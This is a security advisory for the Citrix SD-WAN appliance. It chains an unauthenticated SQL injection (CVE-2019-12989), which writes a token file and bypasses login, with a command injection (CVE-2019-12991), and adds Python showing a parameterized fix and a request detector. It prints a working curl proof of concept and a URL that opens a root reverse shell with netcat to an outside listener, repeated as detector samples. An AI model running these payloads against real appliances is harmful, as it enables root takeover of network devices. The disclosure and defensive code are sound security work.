Multiple vulnerabilities were discovered in the Citrix SD-WAN appliance. By chaining them, a remote, unauthenticated attacker can gain root access on the appliance.
CVE-2019-12989: Unauthenticated SQL Injection /sdwan/nitro/v1/config/get_package_file
The cgi-bin/sdwanrestapi/getpackagefile.cgi Perl script contains a SQL injection vulnerability that can be exploited by a remote,
unauthenticated attacker. User input is concatenated into a SQL query without validation or parameterization. With a crafted
HTTP request, an attacker can append INTO OUTFILE to the injected query and thereby write (and create) files in any location
writable by the 'mysql' user, for instance the /tmp directory. As the proof of concept below shows, the appliance accepts a request
whose 'swc-token' value corresponds to a token file in /tmp, so a SQL injection payload that writes such a token file completely
bypasses the authentication mechanism.
The SQL injection vulnerability can be triggered by crafting the HTTP POST request such that:
- An HTTP header 'SSL_CLIENT_VERIFY' is set with the value 'SUCCESS'
- The query string contains 'action=file_download'
- The Content-Type is 'application/json'
- The POST data is a JSON document containing the SQL injection payload in the 'site_name' value
Below is the vulnerable query. Other queries in the script are built the same way and are affected as well:
if($package_type eq "active"){
    # $site_name_arg is taken from the JSON request body and spliced into the SQL text
    $query = "SELECT observed_sw_revision, appliance_name, expected_sw_revision, package_file_name from Network_Appliance_Active " .
             "WHERE site_name ='" . $site_name_arg . "' AND " .
             "appliance_id=" . $appliance_id_arg.";";
}
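The following Python is an added illustration, not code from the advisory or from the Citrix appliance. It mirrors the string concatenation above, shows the exact SQL text that the proof-of-concept 'site_name' value produces, and places a parameterized query beside it. An in-memory SQLite table stands in for the appliance's MySQL database, so the demonstration payload uses '--' as the comment marker (SQLite has no '#' comments and no INTO OUTFILE); the table columns and sample row are constructed for the example.

```python
import sqlite3

# Constructed input: the 'site_name' value from the advisory's PoC request.
POC_SITE_NAME = ("blah' union select 'tenable','zero','day','research' "
                 "INTO OUTFILE '/tmp/token_01234';#")

COLUMNS = "observed_sw_revision, appliance_name, expected_sw_revision, package_file_name"


def build_query_vulnerable(site_name, appliance_id):
    """Same concatenation as getpackagefile.cgi: site_name is spliced into the
    SQL text, so a single quote inside it terminates the string literal."""
    return ("SELECT " + COLUMNS + " from Network_Appliance_Active "
            "WHERE site_name ='" + site_name + "' AND "
            "appliance_id=" + str(appliance_id) + ";")


def build_query_parameterized(site_name, appliance_id):
    """Hardened form: the SQL text is constant and the values are bound
    separately, so quotes, UNION and INTO OUTFILE in site_name are just data."""
    sql = ("SELECT " + COLUMNS + " FROM Network_Appliance_Active "
           "WHERE site_name = ? AND appliance_id = ?")
    return sql, (site_name, int(appliance_id))


def run_demo():
    """Run both builders against an in-memory SQLite table (constructed schema
    and row) and return (rows from vulnerable query, rows from parameterized query)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Network_Appliance_Active ("
                "site_name TEXT, appliance_id INTEGER, observed_sw_revision TEXT, "
                "appliance_name TEXT, expected_sw_revision TEXT, package_file_name TEXT)")
    con.execute("INSERT INTO Network_Appliance_Active VALUES "
                "('site-a', 1, '10.2.0', 'appl-a', '10.2.1', 'pkg-a.tar')")
    # SQLite stand-in payload: four columns to match the original SELECT list,
    # '--' comments out the trailing "' AND appliance_id=..." as '#' does in MySQL.
    payload = "nosuchsite' UNION SELECT 'attacker','controlled','row','here' -- "
    vuln_rows = con.execute(build_query_vulnerable(payload, 1)).fetchall()
    sql, params = build_query_parameterized(payload, 1)
    safe_rows = con.execute(sql, params).fetchall()
    con.close()
    return vuln_rows, safe_rows


if __name__ == "__main__":
    print(build_query_vulnerable(POC_SITE_NAME, 1))
    print(run_demo())
```

Parameterization removes the injection; on the appliance the file write also depends on the 'mysql' database account holding the FILE privilege and on MySQL's secure_file_priv setting not restricting output locations, so both are worth reviewing independently of the code fix.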
Proof of Concept
In the curl command below, the injected SELECT ... INTO OUTFILE creates a token file at /tmp/token_01234. The four string literals match the four columns of the original SELECT, and the trailing '#' comments out the rest of the query.
curl --insecure -H 'SSL_CLIENT_VERIFY: SUCCESS' -H 'Content-Type: application/json' -d '{"get_package_file": {"site_name": "blah'"' union select 'tenable','zero','day','research' INTO OUTFILE '/tmp/token_01234';#\""',"appliance_type": "primary","package_type": "active"}}' https://192.168.1.212/sdwan/nitro/v1/config/get_package_file?action=file_download
Next, visit this address in a web browser. You should be logged in:
https://192.168.1.212/cgi-bin/vwdash.cgi?swc-token=01234
CVE-2019-12991: Authenticated Command Injection /cgi-bin/installpatch.cgi
installpatch.cgi suffers from a command injection vulnerability. This vulnerability can be exploited by a remote, authenticated
attacker to execute OS commands with root privileges. Specifically, the value of the 'installfile' parameter is passed to the
Perl system() function without validation, so shell metacharacters in it are interpreted by the shell.
Proof of Concept
After bypassing authentication as above, visit the URL below. The backticks make the shell run the embedded command, and sudo runs it as root, so a listener on 192.168.1.191:4444 receives a root shell.
https://192.168.1.212/cgi-bin/installpatch.cgi?swc-token=01234&installfile=`sudo%20nc%20-nv%20192.168.1.191%204444%20-e%20/bin/bash`
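Detection logic for both issues, as an added example that is not part of the advisory: it inspects request records of the kind a reverse proxy or WAF in front of the appliance could log (method, URL, client headers, body), and flags a client-supplied SSL_CLIENT_VERIFY header or SQL metacharacters in 'site_name' on the get_package_file endpoint, and shell metacharacters in 'installfile' on installpatch.cgi. The request records, including the benign one, are constructed for the example; the record format is an assumption.

```python
import json
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed input: the two PoC requests from the advisory plus one benign request.
POC_SITE_NAME = ("blah' union select 'tenable','zero','day','research' "
                 "INTO OUTFILE '/tmp/token_01234';#")

SAMPLE_REQUESTS = [
    {"method": "POST",
     "url": "/sdwan/nitro/v1/config/get_package_file?action=file_download",
     "headers": {"SSL_CLIENT_VERIFY": "SUCCESS", "Content-Type": "application/json"},
     "body": json.dumps({"get_package_file": {"site_name": POC_SITE_NAME,
                                              "appliance_type": "primary",
                                              "package_type": "active"}})},
    {"method": "GET",
     "url": ("/cgi-bin/installpatch.cgi?swc-token=01234&installfile="
             "`sudo%20nc%20-nv%20192.168.1.191%204444%20-e%20/bin/bash`"),
     "headers": {}, "body": ""},
    {"method": "POST",
     "url": "/sdwan/nitro/v1/config/get_package_file?action=file_download",
     "headers": {"Content-Type": "application/json"},
     "body": json.dumps({"get_package_file": {"site_name": "branch-01",
                                              "appliance_type": "primary",
                                              "package_type": "active"}})},
]

# Quote, UNION, INTO OUTFILE or LOAD_FILE in a site name has no legitimate use here.
SQLI_RE = re.compile(r"'|\bunion\b|\binto\s+outfile\b|\bload_file\b", re.IGNORECASE)
# Backtick, $(, ;, |, &, redirections: anything the shell would act on in a filename.
SHELL_META_RE = re.compile(r"[`;|&$<>]|\$\(")


def flag_request(req):
    """Return a list of finding strings for one request record."""
    findings = []
    parts = urlsplit(req["url"])
    path, query = parts.path, parse_qs(parts.query)
    # SSL_CLIENT_VERIFY is normally set by the server's TLS layer, not sent by clients.
    headers = {k.upper(): v for k, v in req["headers"].items()}

    if path.endswith("/sdwan/nitro/v1/config/get_package_file"):
        if "SSL_CLIENT_VERIFY" in headers:
            findings.append("CVE-2019-12989: client-supplied SSL_CLIENT_VERIFY header")
        try:
            body = json.loads(req["body"] or "{}")
            site_name = body.get("get_package_file", {}).get("site_name", "")
        except (ValueError, AttributeError):
            site_name = ""
        if isinstance(site_name, str) and SQLI_RE.search(site_name):
            findings.append("CVE-2019-12989: SQL metacharacters in site_name")

    if path.endswith("/cgi-bin/installpatch.cgi"):
        for value in query.get("installfile", []):
            # parse_qs already decodes once; unquote again to catch double encoding
            if SHELL_META_RE.search(unquote(value)):
                findings.append("CVE-2019-12991: shell metacharacters in installfile")
    return findings


def scan(requests):
    """Return (method, path, findings) for every request record."""
    return [(r["method"], urlsplit(r["url"]).path, flag_request(r)) for r in requests]


if __name__ == "__main__":
    for method, path, findings in scan(SAMPLE_REQUESTS):
        print(method, path, findings or "clean")
```

The header check is the cheapest signal: a client that sends its own SSL_CLIENT_VERIFY header to this endpoint is spoofing the result of certificate verification, whatever the body contains.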